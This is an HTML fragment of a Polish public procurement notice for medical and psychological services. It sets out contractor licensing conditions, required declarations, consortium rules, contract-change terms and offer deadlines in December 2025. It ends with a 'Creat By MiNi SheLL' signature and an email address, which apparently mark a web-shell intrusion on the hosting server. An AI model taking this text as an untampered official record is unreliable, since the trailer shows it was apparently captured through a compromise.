podmiotów wykonujących działalność leczniczą, o której mowa w ustawie z dnia 15 kwietnia 2011 r. o działalności leczniczej (tekst jednolity Dz. U. z 2024 r., poz. 799 ze zm.) <br/>	Posiada przewidziane prawem uprawnienia do wykonywania na obszarze Rzeczypospolitej Polskiej działalności leczniczej w rozumieniu przepisów ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (tekst jednolity Dz. U. z 2024 r., poz. 799 ze zm.),<br/>	Posiada gabinety, w których będą wykonywane usługi medyczne, obiekt oraz urządzenia i sprzęt medyczny wykorzystywane do przeprowadzania badań spełniają standardy określone w Rozporządzeniu Ministra Zdrowia z dnia 26 marca 2019 r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. z 2019 r. poz. 595 ze zm.) oraz w ustawie z dnia 15 kwietnia 2011 r. o działalności leczniczej (tekst jednolity Dz. U. z 2024 r., poz. 799 ze zm.)<br/>	Posiada wpis do rejestru przedsiębiorców prowadzących pracownię psychologiczną prowadzonego przez marszałka województwa opolskiego w myśl obowiązujących przepisów<br/>	Posiada przewidziane prawem uprawnienia do wykonywania zwodu psychologa <br/>	Posiada gabinety, w których będą wykonywane badania, odpowiednie urządzenia do przeprowadzania badań oraz wykwalifikowany personel.<br/>i na potwierdzenie złoży „Oświadczenie wykonawcy dotyczące potwierdzenia posiadania uprawnień” - załącznik nr 8.3 do SWZ<br/>	posiadał sytuację ekonomiczną lub finansową (art. 115 uPZP), i na potwierdzenie złożył: zamawiający nie stawia warunków w tym zakresie.<br/>	posiadał zdolność techniczną lub zawodową (art. 116 uPZP): zamawiający nie stawia warunków w tym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a.	„Oświadczenie wykonawcy” - załącznik nr 5 do SWZ, składa zarówno wykonawca korzystający, jak i nie korzystający z zasobów podmiotów trzecich.<br/>b.	„Oświadczenie podmiotu trzeciego” - załącznik nr 7 do SWZ, składa każdy z podmiotów udostępniający swoje zasoby.<br/>c.	„Oświadczenie współwykonawcy” – załącznik nr 6 do SWZ, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">„Oświadczenie wykonawcy dotyczące potwierdzenia posiadania uprawnień” - załączniki nr 8.1-8.3 do SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a.	Wykonawcy, którzy zamierzają skorzystać z zasobów podmiotów trzecich, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>	Wykonawca powinien samodzielnie spełniać warunek dotyczący zdolności do występowania w obrocie gospodarczym i posiadać uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>	Wykonawca może skorzystać ze zdolności technicznych lub zdolności zawodowych podmiotów trzecich o ile podmiot udostępniający zasoby osobiście wykona usługę, do realizacji której te zdolności są wymagane.<br/>	Wykonawca może skorzystać z sytuacji finansowej lub sytuacji ekonomicznej podmiotów trzecich i warunek zostanie spełniony jeżeli spełnią go wspólnie.<br/>b.	Wykonawcy, którzy wspólnie ubiegają się o zamówienie, tworząc np. spółkę cywilną, lub konsorcjum.<br/>	Zgodnie z art. 58 ust. 2, wykonawcy wspólnie ubiegający się o udzielenie zamówienia, powinni ustanowić pełnomocnika do reprezentowania ich w postępowaniu, albo do reprezentowania ich w postępowaniu i do zawarcia umowy. W przypadku spółki cywilnej dokumentem zastępującym pełnomocnictwo może być umowa spółki lub uchwała wspólników.<br/>	Pełnomocnik działa w imieniu wszystkich współwykonawców i jego działania wywołują skutki prawne wobec nich wszystkich. W toku postępowania korespondencja ze strony zamawiającego będzie kierowana wyłącznie do pełnomocnika.<br/>	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej zostanie spełniony jeżeli co najmniej jeden z nich samodzielnie spełnia ten warunek i osobiście zrealizuje świadczenie, do którego realizacji jest wymagany.<br/>	Warunek dotyczący zdolności technicznych lub zawodowych zostanie spełniony jeżeli co najmniej jeden ze z nich samodzielnie spełnia ten warunek i osobiście zrealizuje świadczenie, do którego jest wymagany.<br/>	Warunek dotyczący potwierdzenia sytuacji finansowej lub ekonomicznej, współwykonawcy mogą spełniać łącznie.<br/>	Warunek dotyczący występowania w obrocie gospodarczym, powinien spełniać każdy ze współwykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a.	Zamawiający przewiduje możliwość zmiany treści zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 uPZP oraz wskazanym w Projektowanych postanowieniach umowy - załączniki nr 1.1-1.2.<br/>b.	Zamawiający zgodnie z art. 440 w związku z art. 439 ust. 2-4 uPZP, przewiduje możliwość zmiany wynagrodzenia w przypadku zmiany cen materiałów lub kosztów związanych z realizacją zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-02 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/10blog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-02 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com